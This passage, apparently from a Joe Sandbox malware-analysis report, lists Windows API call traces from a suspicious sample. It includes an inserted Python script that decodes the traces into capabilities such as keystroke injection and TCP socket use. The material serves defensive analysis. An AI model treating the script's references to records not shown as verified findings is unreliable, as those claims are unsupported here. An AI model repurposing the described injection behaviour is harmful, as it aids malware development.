                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: d3cb20b381c203f283ef61a5276a04a53a10cbdbd78700fe064c0c4d39a7b481
                                              • Instruction ID: d3c5b2cf92df5acf89b4e2f1ab15caa632424531833e0984c9a6d0af2a1321ca
                                              • Opcode Fuzzy Hash: d3cb20b381c203f283ef61a5276a04a53a10cbdbd78700fe064c0c4d39a7b481
                                              • Instruction Fuzzy Hash: 2651B170E006499FDB10CFA9E845AEEBBF9EF0A300F14416AF955E7295D730DA45CB60
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92D4B
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00D92D53
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92DE1
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00D92E0C
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92E61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: 8164f4979820447c13f78f765578bf05d15e5e67f89df57534781dd0e25d6771
                                              • Instruction ID: e4e072498c4f67f4af0485ae6ee9b5a046c878a4217837fd54257358921a3985
                                              • Opcode Fuzzy Hash: 8164f4979820447c13f78f765578bf05d15e5e67f89df57534781dd0e25d6771
                                              • Instruction Fuzzy Hash: 7A418034A01209ABCF14DF68C885AAEBBB5FF44324F188155E814AB292D731EE45CBF0
                                              APIs
                                                • Part of subcall function 00DF304E: inet_addr.WS2_32(?), ref: 00DF307A
                                                • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00DF1112
                                              • WSAGetLastError.WS2_32 ref: 00DF1121
                                              • WSAGetLastError.WS2_32 ref: 00DF11C9
                                              • closesocket.WS2_32(00000000), ref: 00DF11F9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 2675159561-0
                                              • Opcode ID: e8fb1424540e6f90ef858634478bb69d72e6c5686ef62447ffde269b9157cf60
                                              • Instruction ID: a5ddcc3c301910ecf93028aad453ccf20a3c8ca84a350d17a2a078abf0768f00
                                              • Opcode Fuzzy Hash: e8fb1424540e6f90ef858634478bb69d72e6c5686ef62447ffde269b9157cf60
                                              • Instruction Fuzzy Hash: D041F435600208EFDB109F24C884BB9B7E9EF45324F19C159FA49AB291D771EE85CBB1
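The two GetKeyboardState/SetKeyboardState/PostMessageW records above (one posting 0x101, one posting 0x100) and the WS2_32 socket record are easier to triage once the numeric arguments are named: 0x100 and 0x101 are WM_KEYDOWN and WM_KEYUP, the wParam values 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, and socket(2, 1, 6) is AF_INET/SOCK_STREAM/IPPROTO_TCP, i.e. a TCP client socket. The following Python decoder is an added example and is not part of this Joe Sandbox report or Joe Sandbox's own tooling. It assumes the listing format shown on this page (one bullet per call, `Name.MODULE(args), ref: ADDR`, with `?` for unresolved arguments); the sample input is the page's own two listings embedded as constructed strings, and the capability labels it emits are this example's wording, not the report's signature names. Reading the keystroke chain as modifier-key injection into a target window is an inference from the API sequence, consistent with the report's observation that the binary is likely a compiled AutoIt script.

```python
"""Decode the 'APIs' call listings of a Joe Sandbox report into readable summaries.

Added example, not Joe Sandbox code. Assumes the bullet format shown on the page.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Standard Windows SDK names for the numeric values that appear in the listings.
WINDOW_MESSAGES: Dict[int, str] = {
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND",
    0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK",
}
VIRTUAL_KEYS: Dict[int, str] = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
}
ADDRESS_FAMILIES = {2: "AF_INET"}
SOCKET_TYPES = {1: "SOCK_STREAM"}
PROTOCOLS = {6: "IPPROTO_TCP"}

# One bullet line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional "(arg,arg,...)", then "ref: ADDR".
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@$?]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]] = field(default_factory=list)  # None = '?' (unresolved)
    ref: str = ""
    caller: Optional[str] = None  # set for "Part of subcall function" lines


def parse_calls(listing: str) -> List[Call]:
    """Parse every bullet line of an 'APIs' block; hex args become ints, '?' becomes None."""
    calls: List[Call] = []
    for line in listing.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args: List[Optional[int]] = []
        if raw is not None and raw.strip():
            args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("caller")))
    return calls


def describe(call: Call) -> str:
    """Render one call with its numeric constants replaced by SDK names."""
    a = call.args
    if call.api in ("PostMessageW", "SendMessageW") and len(a) >= 3 and a[1] is not None:
        msg = WINDOW_MESSAGES.get(a[1], f"msg=0x{a[1]:X}")
        if msg in ("WM_KEYDOWN", "WM_KEYUP") and a[2] is not None:
            msg += " " + VIRTUAL_KEYS.get(a[2], f"vk=0x{a[2]:X}")
        return f"{call.api}({msg})"
    if call.api == "socket" and len(a) == 3 and None not in a:
        return "socket(%s, %s, %s)" % (
            ADDRESS_FAMILIES.get(a[0], str(a[0])),
            SOCKET_TYPES.get(a[1], str(a[1])),
            PROTOCOLS.get(a[2], str(a[2])),
        )
    return call.api


def capabilities(calls: List[Call]) -> List[str]:
    """Map an API chain to the behaviours a triager would note for it (example wording)."""
    names = {c.api for c in calls}
    rendered = [describe(c) for c in calls]
    found: List[str] = []
    if "AttachThreadInput" in names:
        found.append("attaches to another thread's input queue")
    if "SetKeyboardState" in names and any("WM_KEY" in r for r in rendered):
        found.append("injects modifier keystrokes into a window via PostMessage")
    if any(r.startswith("socket(AF_INET, SOCK_STREAM") for r in rendered):
        found.append("opens a TCP/IPv4 socket")
    if names & {"MoveFileW", "SHFileOperationW"}:
        found.append("moves or deletes files through the shell")
    if {"GetStdHandle", "CreatePipe"} <= names:
        found.append("sets up pipes for a child process's standard handles")
    return found


# Constructed sample input: the two listings from this report, copied as printed.
KEYSTROKE_BLOCK = """\
• GetParent.USER32(00000000), ref: 00DDAD19
• GetKeyboardState.USER32(?), ref: 00DDAD2E
• SetKeyboardState.USER32(?), ref: 00DDAD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DDADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DDADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DDAE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DDAE38
"""
SOCKET_BLOCK = """\
  • Part of subcall function 00DF304E: inet_addr.WS2_32(?), ref: 00DF307A
  • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
• socket.WS2_32(00000002,00000001,00000006), ref: 00DF1112
• WSAGetLastError.WS2_32 ref: 00DF1121
• closesocket.WS2_32(00000000), ref: 00DF11F9
"""

if __name__ == "__main__":
    for block in (KEYSTROKE_BLOCK, SOCKET_BLOCK):
        calls = parse_calls(block)
        for c in calls:
            print(f"{c.ref}: {describe(c)}")
        print("capabilities:", capabilities(calls))
```

Pasting any other "APIs" block from this report into `parse_calls` works the same way; constants that are not in the small lookup tables are printed as raw hex rather than guessed, so an unfamiliar message or key code is visible instead of silently mislabelled.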
                                              APIs
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCF22,?), ref: 00DDDDFD
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCF22,?), ref: 00DDDE16
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DDCF45
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDCF7F
                                              • _wcslen.LIBCMT ref: 00DDD005
                                              • _wcslen.LIBCMT ref: 00DDD01B
                                              • SHFileOperationW.SHELL32(?), ref: 00DDD061
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 3164238972-1173974218
                                              • Opcode ID: fe82534a99333864c3be9133527f676df36e5984ea217d70a5e914dd18f69de1
                                              • Instruction ID: 0826e6634df309fe17c42ddde51ae9c19e562163fa0a9f8d3491133a4675db43
                                              • Opcode Fuzzy Hash: fe82534a99333864c3be9133527f676df36e5984ea217d70a5e914dd18f69de1
                                              • Instruction Fuzzy Hash: 0C4137719452195FDF12EFA4D981ADDB7B9EF48340F1400E7E549EB241EA34A688CB70
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E02E1C
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E4F
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E84
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E02EB6
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E02EE0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02EF1
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E02F0B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 1a60229d87ca944a9f43f1eb0ac29c6276dab344cfdc77d95596239151a3397c
                                              • Instruction ID: 46ff6692474d3c28108a8ac3a0aa1d78ae3a0f7b6fd6a65858ef093b29dc72e8
                                              • Opcode Fuzzy Hash: 1a60229d87ca944a9f43f1eb0ac29c6276dab344cfdc77d95596239151a3397c
                                              • Instruction Fuzzy Hash: CA3119346441419FDB22CF59DC88F6537E4EB8A754F1411A8FA04AB2F1CB72A886DB01
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7769
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD778F
                                              • SysAllocString.OLEAUT32(00000000), ref: 00DD7792
                                              • SysAllocString.OLEAUT32(?), ref: 00DD77B0
                                              • SysFreeString.OLEAUT32(?), ref: 00DD77B9
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD77DE
                                              • SysAllocString.OLEAUT32(?), ref: 00DD77EC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: a87b973820963a80d32822a88ef1525853994e627603e720c603c47eefd96124
                                              • Instruction ID: ea5f54cf8da737455daa375d7cf56fefbb67aa7f92e09486142ea066cb4bc39f
                                              • Opcode Fuzzy Hash: a87b973820963a80d32822a88ef1525853994e627603e720c603c47eefd96124
                                              • Instruction Fuzzy Hash: D421B276604219BFDB10EFA9CC88CBB73ACFB093647148566FA14DB290E670DC8587B0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7842
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7868
                                              • SysAllocString.OLEAUT32(00000000), ref: 00DD786B
                                              • SysAllocString.OLEAUT32 ref: 00DD788C
                                              • SysFreeString.OLEAUT32 ref: 00DD7895
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD78AF
                                              • SysAllocString.OLEAUT32(?), ref: 00DD78BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 4cc9b416ecf28a3e9e1b3d0b7ff9a2fcc1adf95ae7ad7acda300cbfb6f511c47
                                              • Instruction ID: 5c4df460d169f237fa76aeb6202c9fd372b4316584ca71b6883ec5803cbc8016
                                              • Opcode Fuzzy Hash: 4cc9b416ecf28a3e9e1b3d0b7ff9a2fcc1adf95ae7ad7acda300cbfb6f511c47
                                              • Instruction Fuzzy Hash: 1321B331608205AFDB10AFB9DC8DDAA77ECFB083607148166F915DB2A1E670DC85DB74
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00DE04F2
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE052E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: daef73a0e5f65cbc64598414620f85f381457c39b56cde13bf1cab66b582f124
                                              • Instruction ID: 072b83b3ddac6e609c43915de2d8ba03248a0c7fb8828c2c90c0df9cedfe94df
                                              • Opcode Fuzzy Hash: daef73a0e5f65cbc64598414620f85f381457c39b56cde13bf1cab66b582f124
                                              • Instruction Fuzzy Hash: 4E218B71500346AFDB20AF2ADC04A9A7BB4AF45724F244A19F8E5E62E0D7B0D984CF30
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00DE05C6
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE0601
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 7f6182761f9e1f761486a0dee1368ef73c60e00bb9e79942147a238fff324f7b
                                              • Instruction ID: a53aa399b5d23c43fb0666f1c4b1a9ecebb2a6ff2d06dda4a7171f46ac30c52c
                                              • Opcode Fuzzy Hash: 7f6182761f9e1f761486a0dee1368ef73c60e00bb9e79942147a238fff324f7b
                                              • Instruction Fuzzy Hash: 692171755003459FDB20AF6A9C04B5A7BA4AF95720F240B1DE8A1E72E0D7B198E0CB30
                                              APIs
                                                • Part of subcall function 00D7600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                                • Part of subcall function 00D7600E: GetStockObject.GDI32(00000011), ref: 00D76060
                                                • Part of subcall function 00D7600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E04112
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E0411F
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E0412A
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E04139
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E04145
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 904b575ce5e62fc8c773aa7cf8355d178d2a2ed1090fa5247f73a6449c2179a6
                                              • Instruction ID: 11fc14566f48002d0fc0539d2b14f1a99fe2b90d776a01aa2e143e22c854d82b
                                              • Opcode Fuzzy Hash: 904b575ce5e62fc8c773aa7cf8355d178d2a2ed1090fa5247f73a6449c2179a6
                                              • Instruction Fuzzy Hash: D81190B214021DBEEF218F65CC85EE77FADEF08798F005110BB58B2090CA729C61DBA4
                                              APIs
                                                • Part of subcall function 00DAD7A3: _free.LIBCMT ref: 00DAD7CC
                                              • _free.LIBCMT ref: 00DAD82D
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DAD838
                                              • _free.LIBCMT ref: 00DAD843
                                              • _free.LIBCMT ref: 00DAD897
                                              • _free.LIBCMT ref: 00DAD8A2
                                              • _free.LIBCMT ref: 00DAD8AD
                                              • _free.LIBCMT ref: 00DAD8B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                              • Instruction ID: 13ce301860316431b6f6fd2844b88eb3675d6a87dc2d7551de2928f3ad9e8ff0
                                              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                              • Instruction Fuzzy Hash: 68115E71580B04AAD621BFB1CC47FDB7BDDEF02B00F400C25B29BA68A2DB75B5058A71
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DDDA74
                                              • LoadStringW.USER32(00000000), ref: 00DDDA7B
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DDDA91
                                              • LoadStringW.USER32(00000000), ref: 00DDDA98
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DDDADC
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00DDDAB9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 4072794657-3128320259
                                              • Opcode ID: c7943b6784f77c082118c22a62b304742eeadcec8b23e7a10f1a42d3dbd2f190
